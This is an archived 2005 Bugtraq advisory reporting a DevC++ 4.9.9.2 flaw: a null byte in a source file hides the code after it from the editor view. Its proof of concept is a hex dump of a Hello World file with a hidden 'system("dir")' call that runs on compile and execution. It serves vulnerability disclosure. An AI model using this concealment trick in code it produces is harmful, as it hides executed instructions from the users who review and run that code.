| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 18 Aug 2005 11:21:54 -0000
From: retrogod@...ceposta.it
To: bugtraq@...urityfocus.com
Subject: DevC++ V.4.9.9.2 NULL BYTE INSERTION / OBFUSCATION FLAW (by rgod)
DevC++ V.4.9.9.2 NULL BYTE INSERTION / OBFUSCATION FLAW
UPDATE TO HTTP://RGOD.ALTERVISTA.ORG/SYN.HTML
explaining Synedit component obfuscation flaw
exploit: a user can craft a malicious file using null byte (%00) to obfuscate
code and hide malicious instrunctions to the victim user
poc:
this is an hexadecimal dump of poc.cpp file
23 69 6e 63 6c 75 64 65 20 3c 69 6f 73 74 72 65 # i n c l u d e < i o s t r e
61 6d 2e 68 3e 0d 0a 23 69 6e 63 6c 75 64 65 20 a m . h > # i n c l u d e
3c 73 74 64 6c 69 62 2e 68 3e 0d 0a 0d 0a 69 6e < s t d l i b . h > i n
74 20 6d 61 69 6e 28 29 0d 0a 7b 0d 0a 20 20 63 t m a i n ( ) { c
6f 75 74 20 3c 3c 20 22 48 65 6c 6c 6f 20 57 6f o u t < < " H e l l o W o
72 6c 64 21 22 3b 0d 0a 20 20 00 73 79 73 74 65 r l d ! " ; s y s t e
6d 20 28 22 64 69 72 22 29 3b 20 0d 0a 20 20 72 m ( " d i r " ) ; r
65 74 75 72 6e 20 30 3b 0d 0a 7d 20 0d 0a 0d 0a e t u r n 0 ; }
when you open with DevC++,It looks like this:
#include <iostream.h>
#include <stdlib.h>
int main()
{
cout << "Hello World!";
return 0;
}
but when a victim user compile and execute it
system('dir');
will be executed even
rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta.it
original advisoty: http://rgod.altervista.org/devcpp.html
Powered by blists - more mailing lists